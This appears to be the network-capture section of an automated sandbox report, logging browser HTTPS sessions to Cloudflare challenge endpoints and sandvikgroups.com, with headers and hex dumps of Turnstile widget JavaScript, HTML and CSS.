                                        last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                        access-control-allow-origin: *
                                        cross-origin-resource-policy: cross-origin
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8b95fb742f5-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:05:59 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                        Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                        2025-01-07 21:05:59 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                        Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                        2025-01-07 21:05:59 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                        2025-01-07 21:05:59 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                        2025-01-07 21:05:59 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                        Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                        2025-01-07 21:05:59 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                        Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                        2025-01-07 21:05:59 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                        Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                        2025-01-07 21:05:59 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                        Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                        2025-01-07 21:05:59 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                        Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                        2025-01-07 21:05:59 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                        Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.449761188.114.97.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:59 UTC590OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/397843571:1736281603:ect8I6OU7F0koaDox1VrDHVsHkABB-y9YHkkrx60-68/8fe6e8a6e884443e/58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dld HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:59 UTC922INHTTP/1.1 404 Not Found
                                        Date: Tue, 07 Jan 2025 21:05:59 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        cf-chl-out: +cUJFJRzmMLSWxl0Ak+0dzHDnB1zlYt3XYc=$mRM51vznbhnlR0hL
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1JP8%2Bwtg6nJpuB1bLl5zc3m7s6SOJcQUFVq0ulaBEILkIT9c3IuXD14LTorBDDStLY0z8z2CdsaWVfqfzlkMQ1Y5%2FLZB6MNE0ujU7t1mBs8n46biwufoKDWW64LlRNJ6a0rHLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e8bcaf507cae-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1799&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1168&delivery_rate=1597374&cwnd=195&unsent_bytes=0&cid=2f46b7c8dd464465&ts=163&x=0"
                                        2025-01-07 21:05:59 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.449762104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:59 UTC761OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q622a/0x4AAAAAAAAjq6WYeRDKmebM/light/fbE/normal/auto/ HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: iframe
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:59 UTC1362INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:05:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 26637
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                        cross-origin-embedder-policy: require-corp
                                        cross-origin-opener-policy: same-origin
                                        cross-origin-resource-policy: cross-origin
                                        origin-agent-cluster: ?1
                                        accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        referrer-policy: same-origin
                                        document-policy: js-profiling
                                        2025-01-07 21:05:59 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 65 36 65 38 62 63 62 64 63 35 37 64 31 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                        Data Ascii: Server: cloudflareCF-RAY: 8fe6e8bcbdc57d11-EWRalt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:05:59 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                        Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                        2025-01-07 21:05:59 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                        2025-01-07 21:05:59 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                        2025-01-07 21:05:59 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                        2025-01-07 21:05:59 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
